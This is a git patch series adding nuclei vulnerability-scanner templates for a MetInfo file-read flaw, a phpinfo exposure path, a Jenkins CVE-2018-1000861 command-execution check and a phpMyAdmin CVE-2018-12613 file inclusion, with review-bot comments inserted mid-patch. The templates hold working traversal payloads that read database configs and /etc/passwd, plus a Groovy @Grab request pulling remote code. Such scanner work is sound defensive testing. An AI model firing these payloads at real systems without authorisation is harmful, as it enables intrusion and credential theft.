From 6e19a6eb4531c14800f878f558b482ba95844d7a Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Sat, 20 Feb 2021 07:25:43 +0700
Subject: [PATCH 1/7] Create metinfo-lfi.yaml
---
 vulnerabilities/other/metinfo-lfi.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 vulnerabilities/other/metinfo-lfi.yaml
diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml
new file mode 100644
index 0000000000..f502f05546
--- /dev/null
+++ b/vulnerabilities/other/metinfo-lfi.yaml
@@ -0,0 +1,26 @@
+id: metinfo-lfi
+info:
+ name: MetInfo 6.0.0/6.1.0 LFI
+ author: pikpikcu
+ severity: high
+ refrence: https://paper.seebug.org/676/
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
+ - '{{BaseURL}}/include/thumb.php?dir=..././http..././config/config_db.php'
+ - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
+ - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "con_db_pass"
+ - "con_db_name"
+ part: body
+ condition: and
+ - type: status
+ status:
+ - 200
From 2e5cfa3d42906f54b59f8754e21968e7463f7a6f Mon Sep 17 00:00:00 2001
From: sheikhrishad <51270384+hackerrishad@users.noreply.github.com>
Date: Sat, 20 Feb 2021 16:21:07 +0600
Subject: [PATCH 2/7] Update phpinfo.yaml
---
 exposures/configs/phpinfo.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml
index 7836d74b54..bfc8c55cd2 100644
--- a/exposures/configs/phpinfo.yaml
+++ b/exposures/configs/phpinfo.yaml
@@ -19,6 +19,7 @@ requests:
 - "{{BaseURL}}/pinfo.php"
 - "{{BaseURL}}/phpversion.php"
 - "{{BaseURL}}/time.php"
+ - "{{BaseURL}}/index.php"
 matchers:
 - type: word
 words:
From 74479c73096233c53c8e592a7b16214569db3d67 Mon Sep 17 00:00:00 2001
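Review bot: In vulnerabilities/other/metinfo-lfi.yaml (PATCH 1/7) the fourth `path` entry is single-quoted, and YAML does no escape processing inside single quotes, so each `\\` is sent as two literal backslashes rather than one. If a single separator was intended (worth checking against the Seebug reference), use single backslashes inside the single quotes; as written that variant may never match and the template would under-report. The same line is carried unchanged as context in PATCH 6/7. Separately, a match means the response body holds the database settings file, so a `description:` line under `info` saying that scan output will contain credentials and that they need rotating would help whoever triages the finding.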
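Review bot: In exposures/configs/phpinfo.yaml (PATCH 2/7) the new `{{BaseURL}}/index.php` entry points the check at what is usually an application's front page, so the result now rests entirely on how specific the `words` matcher is, and that list lies outside this hunk. If it holds one generic string, pages that merely print a PHP version would be reported as phpinfo exposures; requiring two phpinfo-only strings with `condition: and` plus a `status` matcher for 200 would keep the signal clean. The entry also adds one request per target to every run, which deserves a line in the commit message.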
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Sat, 20 Feb 2021 18:11:15 +0700
Subject: [PATCH 3/7] Update CVE-2018-1000861
---
 cves/2018/CVE-2018-1000861.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 cves/2018/CVE-2018-1000861.yaml
diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml
new file mode 100644
index 0000000000..4e8c3f19d2
--- /dev/null
+++ b/cves/2018/CVE-2018-1000861.yaml
@@ -0,0 +1,25 @@
+id: CVE-2018-1000861
+
+info:
+ name: Jenkins 2.138 Remote Command Execution
+ author: dhiyaneshDK & @pikpikcu
+ severity: critical
+ reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
+ tags: cve,cve2018,jenkin,rce
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;'
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "package#vulntest"
+ part: body
+
+ - type: status
+ status:
+ - 200
From e02d062fa4b9a1c5bbb0f979bb5aa985b6a53de5 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Sat, 20 Feb 2021 18:58:59 +0700
Subject: [PATCH 4/7] Create CVE-2018-12613.yaml
---
 cves/2018/CVE-2018-12613.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 cves/2018/CVE-2018-12613.yaml
diff --git a/cves/2018/CVE-2018-12613.yaml b/cves/2018/CVE-2018-12613.yaml
new file mode 100644
index 0000000000..d9db64353f
--- /dev/null
+++ b/cves/2018/CVE-2018-12613.yaml
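Review bot: The `tags` line in cves/2018/CVE-2018-1000861.yaml (PATCH 3/7) spells the product tag `jenkin`, so a scan filtered on the `jenkins` tag would skip this critical-severity check; it should read `tags: cve,cve2018,jenkins,rce`, and PATCH 5/7 touches only the `name` line. The path also fixes the user segment to `admin` and the word matcher expects `package#vulntest` to be echoed in a 200 response, so a negative result presumably does not prove a host is patched. A `description:` line under `info` stating those assumptions would keep the template from being read as a clean bill of health.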
@@ -0,0 +1,25 @@
+id: CVE-2018-12613
+
+info:
+ name: PhpMyAdmin 4.8.1 Remote File Inclusion
+ author: pikpikcu
+ severity: critical
+ reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
+ tags: cve,cve2018,phpmyadmin,lfi
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ part: body
+
+ - type: status
+ status:
+ - 200
From 18d1384c083ffa1b495eb76cf3744de1490ab5cc Mon Sep 17 00:00:00 2001
From: sandeep <8293321+bauthard@users.noreply.github.com>
Date: Sat, 20 Feb 2021 19:17:47 +0530
Subject: [PATCH 5/7] Update CVE-2018-1000861.yaml
---
 cves/2018/CVE-2018-1000861.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml
index 4e8c3f19d2..ffecdfff4b 100644
--- a/cves/2018/CVE-2018-1000861.yaml
+++ b/cves/2018/CVE-2018-1000861.yaml
@@ -1,7 +1,7 @@
 id: CVE-2018-1000861
 info:
- name: Jenkins 2.138 Remote Command Execution
+ name: Jenkins 2.138 Remote Command Execution
 author: dhiyaneshDK & @pikpikcu
 severity: critical
 reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
From 5ffc1aa211272f0302f660734b73d4db7698e78e Mon Sep 17 00:00:00 2001
From: sandeep <8293321+bauthard@users.noreply.github.com>
Date: Sat, 20 Feb 2021 19:24:20 +0530
Subject: [PATCH 6/7] Update metinfo-lfi.yaml
---
 vulnerabilities/other/metinfo-lfi.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml
index f502f05546..9a794bbcb0 100644
--- a/vulnerabilities/other/metinfo-lfi.yaml
+++ b/vulnerabilities/other/metinfo-lfi.yaml
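Review bot: In cves/2018/CVE-2018-12613.yaml (PATCH 4/7) the `name` says Remote File Inclusion while the `tags` line says `lfi` and the request reads a local file; the name should agree, `name: PhpMyAdmin 4.8.1 Local File Inclusion`. The single unauthenticated GET and the `/etc/passwd` regex also mean the check can only fire on Linux hosts where phpMyAdmin serves `index.php` without a login, which as far as I know is not the usual precondition for this CVE, so many vulnerable installs would come back clean. A `description:` line under `info` saying so, and naming the upgrade to a fixed release as the remediation, would keep a negative result from being read as proof of patching.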
@@ -3,13 +3,13 @@ info:
 name: MetInfo 6.0.0/6.1.0 LFI
 author: pikpikcu
 severity: high
- refrence: https://paper.seebug.org/676/
+ reference: https://paper.seebug.org/676/
+ tags: metinfo,lfi
 requests:
 - method: GET
 path:
 - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
- - '{{BaseURL}}/include/thumb.php?dir=..././http..././config/config_db.php'
 - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
 - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
From 115c337512d10718ecc6d8344da7d85cebb244db Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 20 Feb 2021 13:56:17 +0000
Subject: [PATCH 7/7] Auto Update README [Sat Feb 20 13:56:17 UTC 2021] :robot:
---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 22ae188369..8a03b1ecd3 100644
--- a/README.md
+++ b/README.md
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 198 | vulnerabilities | 91 | exposed-panels | 74 | +| cves | 200 | vulnerabilities | 92 | exposed-panels | 74 | | exposures | 47 | technologies | 46 | misconfiguration | 43 | | workflows | 21 | miscellaneous | 12 | default-logins | 10 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 573 files**. +**61 directories, 576 files**.